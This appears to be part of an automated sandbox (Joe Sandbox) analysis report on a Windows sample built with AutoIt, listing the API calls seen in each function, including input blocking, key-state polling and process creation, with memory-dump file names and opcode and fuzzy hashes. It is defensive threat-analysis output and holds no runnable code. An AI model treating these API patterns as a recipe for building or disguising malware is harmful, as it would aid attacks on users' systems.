                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                        • Part of subcall function 003BB736: GetCursorPos.USER32(000000FF), ref: 003BB749
                                                                                                                        • Part of subcall function 003BB736: ScreenToClient.USER32(00000000,000000FF), ref: 003BB766
                                                                                                                        • Part of subcall function 003BB736: GetAsyncKeyState.USER32(00000001), ref: 003BB78B
                                                                                                                        • Part of subcall function 003BB736: GetAsyncKeyState.USER32(00000002), ref: 003BB799
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0041F417,?,?,?,?,?,00000001,?), ref: 0040EA9C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2356834413-0
                                                                                                                      • Opcode ID: d9478ab33aa33cdd5a0d29d82c546f7bef8425c6e1ba8db0c4152a70f7231be1
                                                                                                                      • Instruction ID: e0b7b80e003fcd250b3a47030510eaedc29a8a2fd46a4cdb85d179b45da9296d
                                                                                                                      • Opcode Fuzzy Hash: d9478ab33aa33cdd5a0d29d82c546f7bef8425c6e1ba8db0c4152a70f7231be1
                                                                                                                      • Instruction Fuzzy Hash: 96F08231200219ABDB15AF15CC06ABA3B61FB04794F044025FA165B1A1D7B69972DBD5
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,003BAF40,?,?,?,?,?), ref: 003BB83B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogLongNtdllProc_Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2065330234-0
                                                                                                                      • Opcode ID: 2f0bdaf5179be69c3fb88169a6086ae2f3dd5ecf031ffb3acca005bced999e73
                                                                                                                      • Instruction ID: 9b6c21b2eef33fd30af24c76f7b15af8516502a35a98d481ce431d78a339baa2
                                                                                                                      • Opcode Fuzzy Hash: 2f0bdaf5179be69c3fb88169a6086ae2f3dd5ecf031ffb3acca005bced999e73
                                                                                                                      • Instruction Fuzzy Hash: 48F08934600209DFDB15EF14DC519753BA6FB05360F144129F9528B6B0E7B1DC51DB55
                                                                                                                      APIs
                                                                                                                      • BlockInput.USER32(00000001), ref: 003F7057
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BlockInput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3456056419-0
                                                                                                                      • Opcode ID: 4332ccf25c9d255d18874c30d4a54bad5dbedc054eef94c6197c616165b95cb1
                                                                                                                      • Instruction ID: 1f242d97550c40700fa7f66fbc714b4e1ef2519030301191ff3c109b0dfe570f
                                                                                                                      • Opcode Fuzzy Hash: 4332ccf25c9d255d18874c30d4a54bad5dbedc054eef94c6197c616165b95cb1
                                                                                                                      • Instruction Fuzzy Hash: 90E012752142055FC7109B69D404A96F7DD9F59750F018426AA45D7251DAB0E8008BA0
                                                                                                                      APIs
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0040F41A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogNtdllProc_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3239928679-0
                                                                                                                      • Opcode ID: 2a083362c7fb6accf77206ce9a72a016ff65136573d28150e07d1ad4872939fe
                                                                                                                      • Instruction ID: dc398a2e89c7c49fcc4ee6b22d14ab4d9c5f379711cec635f1a48a069e62b747
                                                                                                                      • Opcode Fuzzy Hash: 2a083362c7fb6accf77206ce9a72a016ff65136573d28150e07d1ad4872939fe
                                                                                                                      • Instruction Fuzzy Hash: 45F06531204245BFDB21EF58DC05FC63B95FB05360F184429FA51672E1DB756820D769
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 003BACC7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogLongNtdllProc_Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2065330234-0
                                                                                                                      • Opcode ID: 767d424c25411ca3f085577a6de82e0eb535e20b9af4a6f1ed6535ec1a115d43
                                                                                                                      • Instruction ID: cc8152b16d1f2fd73146fedb6868f884a46fd63c9600629dab4d8f4329d79325
                                                                                                                      • Opcode Fuzzy Hash: 767d424c25411ca3f085577a6de82e0eb535e20b9af4a6f1ed6535ec1a115d43
                                                                                                                      • Instruction Fuzzy Hash: 43E08C31200208FBCF05AF90CC01EA83B26FB48384F108028F6058F6B1CB73A422EB45
                                                                                                                      APIs
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0041F3D4,?,?,?,?,?,?), ref: 0040F450
                                                                                                                        • Part of subcall function 0040E13E: _memset.LIBCMT ref: 0040E14D
                                                                                                                        • Part of subcall function 0040E13E: _memset.LIBCMT ref: 0040E15C
                                                                                                                        • Part of subcall function 0040E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00463EE0,00463F24), ref: 0040E18B
                                                                                                                        • Part of subcall function 0040E13E: CloseHandle.KERNEL32 ref: 0040E19D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2364484715-0
                                                                                                                      • Opcode ID: b398f14e10f31a9d24a3532f55e127235751c7b1050bbcf0681cdc1dba31d229
                                                                                                                      • Instruction ID: 2b9854e28f251cf595ff7abb9a1a675f1df901561ccf51f1c1230289a6ca45c3
                                                                                                                      • Opcode Fuzzy Hash: b398f14e10f31a9d24a3532f55e127235751c7b1050bbcf0681cdc1dba31d229
                                                                                                                      • Instruction Fuzzy Hash: 99E04631200208EFCB21EF19DC04E9A37A2FB08344F058036FA006B2B2C771A861EF49
                                                                                                                      APIs
                                                                                                                      • NtdllDialogWndProc_W.NTDLL ref: 0040F3A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogNtdllProc_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3239928679-0
                                                                                                                      APIs
                                                                                                                      • NtdllDialogWndProc_W.NTDLL ref: 0040F3D0
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogNtdllProc_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3239928679-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                        • Part of subcall function 003BB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,003BB85B), ref: 003BB926
                                                                                                                        • Part of subcall function 003BB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,003BB85B,00000000,?,?,003BAF1E,?,?), ref: 003BB9BD
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,003BAF1E,?,?), ref: 003BB864
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2797419724-0
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 003C8E1F
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(003C6AE9,004567D8,00000014), ref: 003CA937
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 54951025-0
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 003FA7A5
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 003FA7B7
                                                                                                                      • DestroyWindow.USER32 ref: 003FA7C5
                                                                                                                      • GetDesktopWindow.USER32 ref: 003FA7DF
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 003FA7E6
                                                                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003FA927
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003FA937
                                                                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FA97F
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 003FA98B
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003FA9C5
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FA9E7
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FA9FA
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FAA05
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 003FAA0E
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FAA1D
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 003FAA26
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FAA2D
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 003FAA38
                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 003FAA4A
                                                                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0042D9BC,00000000), ref: 003FAA60
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 003FAA70
                                                                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 003FAA96
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 003FAAB5
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FAAD7
                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003FACC4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                      • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                                                                                                      • API String ID: 2211948467-3613752883
                                                                                                                      • Opcode ID: 25e12538d7ce849bb945f8c2137e7c53c1af323596f23c11df0f8b5985b3f4ed
                                                                                                                      • Instruction ID: 9fd8eb6b5634f869ac3de01173e77481e476b3211cbffc1f1b2d82251a80fe8d
                                                                                                                      • Opcode Fuzzy Hash: 25e12538d7ce849bb945f8c2137e7c53c1af323596f23c11df0f8b5985b3f4ed
                                                                                                                      • Instruction Fuzzy Hash: 12028171A00208EFDB15DF64CC89EAE7BB9FF49310F148169F905AB2A1DB709D41CB64
                                                                                                                      APIs
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040D0EB
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0040D11C
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040D128
                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 0040D142
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0040D151
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0040D17C
                                                                                                                      • GetSysColor.USER32(00000010), ref: 0040D184
                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 0040D18B
                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 0040D19A
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040D1A1
                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0040D1EC
                                                                                                                      • FillRect.USER32(?,?,00000000), ref: 0040D21E
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040D249
                                                                                                                        • Part of subcall function 0040D385: GetSysColor.USER32(00000012), ref: 0040D3BE
                                                                                                                        • Part of subcall function 0040D385: SetTextColor.GDI32(?,?), ref: 0040D3C2
                                                                                                                        • Part of subcall function 0040D385: GetSysColorBrush.USER32(0000000F), ref: 0040D3D8
                                                                                                                        • Part of subcall function 0040D385: GetSysColor.USER32(0000000F), ref: 0040D3E3
                                                                                                                        • Part of subcall function 0040D385: GetSysColor.USER32(00000011), ref: 0040D400
                                                                                                                        • Part of subcall function 0040D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0040D40E
                                                                                                                        • Part of subcall function 0040D385: SelectObject.GDI32(?,00000000), ref: 0040D41F
                                                                                                                        • Part of subcall function 0040D385: SetBkColor.GDI32(?,00000000), ref: 0040D428
                                                                                                                        • Part of subcall function 0040D385: SelectObject.GDI32(?,?), ref: 0040D435
                                                                                                                        • Part of subcall function 0040D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0040D454
                                                                                                                        • Part of subcall function 0040D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0040D46B
                                                                                                                        • Part of subcall function 0040D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0040D480
                                                                                                                        • Part of subcall function 0040D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0040D4A8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3521893082-2594219639
                                                                                                                      • Opcode ID: e7af8ee5c1a13c851ba2b40eaca7b60fbd941ce956f8c58a1bd539669c61c0d8
                                                                                                                      • Instruction ID: b6c8807c403196b907836dd096274ffea35a4a315e4be16f3b0a1168bce6dd8b
                                                                                                                      • Opcode Fuzzy Hash: e7af8ee5c1a13c851ba2b40eaca7b60fbd941ce956f8c58a1bd539669c61c0d8
                                                                                                                      • Instruction Fuzzy Hash: 8991D371908301FFC7209F64DC08E6BBBA9FF89325F500A29F962A61E0C775D946CB56
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 003FA42A
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003FA4E9
                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003FA527
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003FA539
                                                                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 003FA57F
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 003FA58B
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 003FA5CF
                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003FA5DE
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 003FA5EE
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 003FA5F2
                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003FA602
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003FA60B
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 003FA614
                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003FA642
                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 003FA659
                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 003FA694
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003FA6A8
                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 003FA6B9
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 003FA6E9
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 003FA6F4
                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003FA6FF
                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003FA709
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                      • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                      • API String ID: 2910397461-2771358697
                                                                                                                      • Opcode ID: 196c40c6367a8ca1b416a21aa4437e1cb20bfbc206de97582c014386b4dda42d
                                                                                                                      • Instruction ID: 8fd3a43c480f5496e149d548caa9747536212eb7760476244c6b710ea508c136
                                                                                                                      • Opcode Fuzzy Hash: 196c40c6367a8ca1b416a21aa4437e1cb20bfbc206de97582c014386b4dda42d
                                                                                                                      • Instruction Fuzzy Hash: B3A182B1A00219BFEB15DFA5DC4AFAE7BB9EB05710F104125F614AB2E0D7B0AD01CB64
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000012), ref: 0040D3BE
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 0040D3C2
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0040D3D8
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040D3E3
                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 0040D3E8
                                                                                                                      • GetSysColor.USER32(00000011), ref: 0040D400
                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0040D40E
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0040D41F
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0040D428
                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040D435
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0040D454
                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0040D46B
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0040D480
                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0040D4A8
                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0040D4CF
                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0040D4ED
                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 0040D4F8
                                                                                                                      • GetSysColor.USER32(00000011), ref: 0040D506
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040D50E
                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0040D522
                                                                                                                      • SelectObject.GDI32(?,0040D0B5), ref: 0040D539
                                                                                                                      • DeleteObject.GDI32(?), ref: 0040D544
                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040D54A
                                                                                                                      • DeleteObject.GDI32(?), ref: 0040D54F
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 0040D555
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 0040D55F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 1996641542-2594219639
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 003EE45E
                                                                                                                      • GetDriveTypeW.KERNEL32(?,0043DC88,?,\\.\,0043DBF0), ref: 003EE54B
                                                                                                                      • SetErrorMode.KERNEL32(00000000,0043DC88,?,\\.\,0043DBF0), ref: 003EE6B1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
